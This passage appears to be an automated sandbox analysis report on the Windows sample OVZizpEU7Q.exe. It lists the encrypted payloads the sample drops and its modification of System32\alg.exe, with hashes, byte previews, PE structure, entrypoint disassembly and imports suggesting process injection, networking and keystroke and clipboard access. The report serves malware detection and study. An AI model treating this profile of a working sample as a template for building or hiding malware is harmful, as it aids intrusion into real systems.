                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\G109m407

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\choice.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\apostrophise

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288768
                                                                                      Entropy (8bit):7.995563535963549
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:MPK+kRU42gRD/oqJDzLzPuj39xkyt2HNJnMmQEFBPIz1HcUnS2:MP7+UBeD/hs3Dkyt2HNJnhLgz1zf
                                                                                      MD5:6511CF77F2157C57B6B23F8A02E86041
                                                                                      SHA1:085352A9D0D342D44FF0ED7048294E2E0029C2F2
                                                                                      SHA-256:336C36FD60E9B7F20CBD93B1156768CFB53CAC9DE0F2620863493A4C86E6E63F
                                                                                      SHA-512:F2C45D643A325BB80DEC69E6F6B2BF2E6D01FA30773B4B978044143787807A408444706363B8232EA4C94A3BC3BCFFB56E2B86AD56EFDC66079DDC37FF323C60
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:xc.RG57N<7NP..2U.KUJMPRSv1P59XRD57N87NPFF2ULKUJMPRS61P59XRD5.N87@O.H2.E.t.L..rbY9F.( +RE/U.-1((]!l)0j?%<s__pqv.r)ZS+.:CZbF2ULKUJ4Q[..Q7..85..W).-...|R2.Q..l24.+...d2#.e'[_s0!.2ULKUJMP..61.48X...aN87NPFF2.LITAL[RS`5P59XRD57N8"NPFV2UL;QJMP.S6!P59ZRD37N87NPF@2ULKUJMP"W61R59XRD55Nx.NPVF2ELKUJ]PRC61P59XBD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P.M=*057N|bJPFV2UL.QJM@RS61P59XRD57N8.NP&F2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P5

                                                                                      C:\Users\user\AppData\Local\Temp\autDAA9.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):288768
                                                                                      Entropy (8bit):7.995563535963549
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:MPK+kRU42gRD/oqJDzLzPuj39xkyt2HNJnMmQEFBPIz1HcUnS2:MP7+UBeD/hs3Dkyt2HNJnhLgz1zf
                                                                                      MD5:6511CF77F2157C57B6B23F8A02E86041
                                                                                      SHA1:085352A9D0D342D44FF0ED7048294E2E0029C2F2
                                                                                      SHA-256:336C36FD60E9B7F20CBD93B1156768CFB53CAC9DE0F2620863493A4C86E6E63F
                                                                                      SHA-512:F2C45D643A325BB80DEC69E6F6B2BF2E6D01FA30773B4B978044143787807A408444706363B8232EA4C94A3BC3BCFFB56E2B86AD56EFDC66079DDC37FF323C60
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:xc.RG57N<7NP..2U.KUJMPRSv1P59XRD57N87NPFF2ULKUJMPRS61P59XRD5.N87@O.H2.E.t.L..rbY9F.( +RE/U.-1((]!l)0j?%<s__pqv.r)ZS+.:CZbF2ULKUJ4Q[..Q7..85..W).-...|R2.Q..l24.+...d2#.e'[_s0!.2ULKUJMP..61.48X...aN87NPFF2.LITAL[RS`5P59XRD57N8"NPFV2UL;QJMP.S6!P59ZRD37N87NPF@2ULKUJMP"W61R59XRD55Nx.NPVF2ELKUJ]PRC61P59XBD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P.M=*057N|bJPFV2UL.QJM@RS61P59XRD57N8.NP&F2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P59XRD57N87NPFF2ULKUJMPRS61P5

                                                                                      C:\Users\user\AppData\Roaming\dfc48433435cc549.bin

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):12320
                                                                                      Entropy (8bit):7.986399894518101
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:QtcLuEUmps/SUssnrht/iWzDT+GK+/1jHfhxyhx2WXVRtTCqfj30P/7xVyrR58Hi:QCSEz3snT/XHTKaj6TffLK7Qei
                                                                                      MD5:265F227113EF5E646CF72DD33E87EBED
                                                                                      SHA1:B3F657D038B12E29D611C8F2728720CC4DE74766
                                                                                      SHA-256:1B5F02F9177C98211A24D851C6F6414E6926B54D32E01CA1295A065E0514FC5B
                                                                                      SHA-512:B9CAD859F126415B272F4A73352C29DFC0571CF448DB65120FCA991C5E16109E39B13EC513B2E4A918C6556EE1410B41C3B0CDAFF0D85AFA282371C4695BDD36
                                                                                      Malicious:false
                                                                                      Preview:u...F......J".d.L..&Fm.....E.{;<.?R<...@`#...]M........s....Bhj....=.<d...3...v}>%....1W(.Xp..Q...r..2...`...a`...30z.w...us.I...l....!N..E......]..BM&T`.E.H..F..su.......E....S....(I.,v.j..Y. ....Q.W..._M.jx..z.u..n......)]%Z...R.d....._......?...lpl....y.c.%2.h.....{v..1z.:..{.m...0...7gy../..^..]..x...m.7...._...........p...qP.f.r..$.&[......#.b7.....X.N;..X.1".}T.....C..}Cj...5}.....h..oQB..^=zkA.C.Y.Z...p.en\..>.C...^.T..O.....Q{..Z....r]...#.\v4.......KT."p/....1.._.)....+H.S=.{.1W...(.)Q....\..\.D.........[(...!.........].2..L...T.:..rb.a.t.B..S6..vm..Eap6..|W...wL..........K.v.....M,.&Rnw'..weeL..!.@M.%.@b..mY....-J....w.6..N.v... .nB~...C.,.+1.........u .;....m......:....9.m.... R.|'.'.a.7s....Y....N).9S...w....'.U.=<xA..Yj.X.8....%.I...)..}...~!S..l.o..5.A]l..y..{.....u....o..hsP.s.RdD.<R.[.v..)..&Y9dy..{...:.T`...vY.....n6....;.x..".0...^..~...L.F..L.'o...`..._.....O~........6.$.w}./.t.6.oA.2..0.....D.....xN.EI..T+.c:T.......J.

                                                                                      C:\Windows\System32\alg.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\OVZizpEU7Q.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):1594368
                                                                                      Entropy (8bit):4.175693383978121
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:IEP3RFsV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:jFQVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                      MD5:BD4DB052E1A0C00732CCA12CCF6025F8
                                                                                      SHA1:93574FCD260C27B0C12781320A10196BAB31010E
                                                                                      SHA-256:2FA160E5F7ADCC8E539E3EEE286988207C212A2598E199FFA8E7D231CB184162
                                                                                      SHA-512:10DA0F472E316E53FDCC5DDC856C3F005728F01BB57329C369586364F1B3A92155AB8DFB20FDB0674F5D620FDED2EC9F988A00E9632E7511B8C91ED2ADCBF82E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................n..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.515582966108426
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:OVZizpEU7Q.exe
                                                                                      File size:1'786'368 bytes
                                                                                      MD5:b5c6ac313fa5167296fbe879f26c4e0f
                                                                                      SHA1:d03372158b51e7c5925b372758a52ea118d5e09b
                                                                                      SHA256:8ddfda62decd6de3185b1ec3bebe067a20a124a39f8483afa9bbc47b3f3d0c09
                                                                                      SHA512:ea32599268aff74c0244902d6378b96c8b43514b1ac8226a9c20f84395a00daec659208afb0c97266cd04eb8fed420bc32239a56e58d9f2f991b54afb06f6274
                                                                                      SSDEEP:49152:oW0c++OCvkGs9FaZZgBafcReY4gFIDRRAubt5M:DB3vkJ9ogAOecUf
                                                                                      TLSH:D985E02273DDC361CB669173FF29B7016FBB38614630B85B1F940D79A960172262DBA3
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                      File Icon

                                                                                      Icon Hash:aaf3e3e3938382a0

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x427dcd
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x675FB5F8 [Mon Dec 16 05:09:12 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      call 00007F0E8CD4ADCAh
                                                                                      jmp 00007F0E8CD3DB94h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007F0E8CD3DD1Ah
                                                                                      cmp edi, eax
                                                                                      jc 00007F0E8CD3E07Eh
                                                                                      bt dword ptr [004C31FCh], 01h
                                                                                      jnc 00007F0E8CD3DD19h
                                                                                      rep movsb
                                                                                      jmp 00007F0E8CD3E02Ch
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007F0E8CD3DEE4h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007F0E8CD3DD20h
                                                                                      bt dword ptr [004BE324h], 01h
                                                                                      jc 00007F0E8CD3E1F0h
                                                                                      bt dword ptr [004C31FCh], 00000000h
                                                                                      jnc 00007F0E8CD3DEBDh
                                                                                      test edi, 00000003h
                                                                                      jne 00007F0E8CD3DECEh
                                                                                      test esi, 00000003h
                                                                                      jne 00007F0E8CD3DEADh
                                                                                      bt edi, 02h
                                                                                      jnc 00007F0E8CD3DD1Fh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007F0E8CD3DD23h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007F0E8CD3DD75h
                                                                                      bt esi, 03h
                                                                                      jnc 00007F0E8CD3DDC8h

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [ASM] VS2013 build 21005
                                                                                      • [ C ] VS2013 build 21005
                                                                                      • [C++] VS2013 build 21005
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2013 UPD4 build 31101
                                                                                      • [RES] VS2013 build 21005
                                                                                      • [LNK] VS2013 UPD4 build 31101

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5da3c.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x8dcc40x8de009eabb8c7c6b5ac654f447d2b95283d23False0.5728679102422908data6.676135712344587IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0xc70000x5da3c0x5dc002b27632cf6daf83cd96bec484dfe0526False0.9294114583333334data7.898594879080545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x1250000x960000x95000f6cef3e956d4181439cca9119a30ed0fFalse0.975751428796141data7.9380325794644255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                      RT_RCDATA0xcf7b80x54d01data1.0003339157668691
                                                                                      RT_GROUP_ICON0x1244bc0x76dataEnglishGreat Britain0.6610169491525424
                                                                                      RT_GROUP_ICON0x1245340x14dataEnglishGreat Britain1.25
                                                                                      RT_GROUP_ICON0x1245480x14dataEnglishGreat Britain1.15
                                                                                      RT_GROUP_ICON0x12455c0x14dataEnglishGreat Britain1.25
                                                                                      RT_VERSION0x1245700xdcdataEnglishGreat Britain0.6181818181818182
                                                                                      RT_MANIFEST0x12464c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                      Imports

                                                                                      DLLImport
                                                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                      UxTheme.dllIsThemeActive
                                                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
